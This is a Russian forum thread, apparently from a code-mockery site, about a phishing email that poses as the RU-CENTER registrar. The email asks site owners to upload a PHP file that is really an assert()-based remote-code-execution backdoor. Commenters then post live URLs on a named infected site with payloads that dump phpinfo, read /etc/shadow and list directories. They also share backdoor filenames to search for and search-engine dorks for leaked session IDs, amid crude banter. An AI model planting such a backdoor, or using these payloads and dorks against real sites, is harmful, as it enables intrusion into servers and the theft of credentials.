- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить,
что фактическое управление доменом ******* осуществляется лицом,
указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом,
создайте в корневой директории сайта файл a7offau08fn0f81n.php со следующим
содержимым:
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>
Файл должен быть создан в течение трех рабочих дней с момента получения
настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00
(UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет
пройдена, делегирование домена будет приостановлено.
© АО «Региональный Сетевой Информационный Центр» (RU-CENTER)
8 800 775-29-99, 8 800 250-27-99,
+7 495 994-46-01
Вы подписались на рассылку в настройках уведомлений.
Отписаться от рассылки
Интересно, в какой функции здесь remote code execution - в stripslashes или в assert? Не удивлюсь, если в обоих.
Царь проектировал.
Более подозрительная питушня. Если не знаешь пхп в совершенстве, не начнёшь подозревать assert.
Это где сорокапятиилетний жадный девственник с лысиной, пузом и отдышкой, живущий с мамой, и любящий играть в танчики пытается найти девушку своей мечты?
Надо было ещё ИИ для знакомства.
Фу
Капча то хуйня, в общем-то.
Сложно сказать что хуже.
http://psyaba.ru/index/a7offau08fn0f81n_php/0-31
http://monrostudio.ru/a7offau08fn0f81n-php
http://www.balans-auto.ru/a1offau08f10z81n.php
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=printf('TbI+XYU ');
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=phpinfo();
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(file('/etc/shadow'));
http://www.balans-auto.ru/a1offau08f10z81n.php?R01=var_dump(scandir('/home/c17271/public_html'));
Пруф, что сработало, проверьте:
http://www.balans-auto.ru/
через неделю ему напишут сайт-визитку, а через три он обеспечит прибылью своих внуков
paid-till: 2017.01.26
вебархив дает странную картину, в 2014 было че-то, в 2015 уже грусть
Кто-то проверил, что работает unlink()?
огромного питуха тут тоже переживут
P.S.: Я про "unlink()".
2 октября 2016: Приветствуем! Сайт balans-auto.ru только что создан.
7 марта 2016: Приветствуем! Сайт balans-auto.ru только что создан.
9 января 2016: Приветствуем! Сайт balans-auto.ru только что создан.
16 ноября 2015: Приветствуем! Сайт balans-auto.ru только что создан.
1 августа 2015: Приветствуем! Сайт balans-auto.ru только что создан.
16 декабря 2014: Автоломбард по займу денег в Москве - +7929-636-7575 Круглосуточно
Таким образом, сайт исчез в промежутке между 16 декабря 2014 и 1 августа 2015. Значит, владельцу похуй уже полтора-два года.
https://yandex.ru/search/?text=site%3Abalans-auto.ru
https://www.google.ru/search?q=site%3Abalans-auto.ru
http://www.bing.com/search?q=site%3Abalans-auto.ru
http://oknacolor.ru/a7offau08fn0f81n.php
P.S. Гуглим ещё это:
a7odfa980f11ce6.php
a7offau12fn0f83f.php
a1offau08f10z81n.php
a1offau08fn0f81n.php
Говорят, в своё время куча эсэмэсок, отправленных пользователям «Мегафона», утекли в сеть благодаря Яндекс.Бару, потому что там была авторизация через get-параметр.
А за пользователями Хрома иногда ходит Гуглобот...
facepalm.jpg
inurl:sessid
inurl:sessionid
inurl:session_id
inurl:phpsessid
inurl:phpsessionid
inurl:phpsession_id
И ещё что-нибудь в таком духе.
Ещё некоторые сайты (сайты знакомств, интернет-магазины) присылают по е-мейлу уведомления о новых событиях, а в письмо вкладывают ссылку с токеном для авторизации. Если такая ссылка утечёт в поисковик, то поисковик сможет выполнять действия от твоего имени...
Забавно будет, если действия тоже через get.
Для пыхопитушни, однако, обычное дело
Более того, такой одноразовый токен и нужен то только для восстановления пароля. В остальных случаях юзера надо для начала на страницу логина сводить (если куки отсутствуют при достижении целевой страницы)
Говорят, что в Одноклассниках когда-то давным давно sessionid был в get-параметрах, но потом убрали.
Зато они логин по хттп до последнего держали.
З.Ы. Кстати, на рутрекере она тоже есть.
Только несколько месяцев назад всех перевели на https и галочку убрали.
Это у всех так, походу. В кои-то веки можно залогиниться и поюзать нормальный поиск...
Не понял.
Ну через тор-браузер неудобно же.
Да на крайний случай можно и голландцем прикинуться в пару команд... А аддоны я не люблю, да и ставить их лень.
Там внутрях найдешь ты хттпс проксю, на которую можно ходить даже если сайт не забанен
Правда никто не умеет в настройки прокси по хттпс без PAC: только хром может если сказать --proxy=
http://kkblog.ru/phishing-spam/
Прямая ссылка на скриншот, чтобы не читать много буков:
http://kkblog.ru/wp-content/uploads/2016/12/rkn-phishing.png
P.S.:
https://habrahabr.ru/post/265515/
Аноним (9):
Язык весьма неплохой. В каждой функции есть своя изюминка. Например, при помощи file_exists() можно не только проверить существование файла, но и начать выполнять код, заботливо предоставленный третьей стороной. Удобная фича, рекомендую.
Если в вашем языке функция проверки существования файла не способна запускать код, просьба меня не беспокоить.
Но вроде ж поддержка этого говна по дефолту выключена в РНР.ІИI...
Чтобы отключить, нужно перекомпилировать, предварительно запустив ./configure --disable-phar.
Какой багор )))
Какая смекалка )))
>Центр гомеопатии в Куркино
Хмм.. Интересно, бывает ли гомеопатическая психология?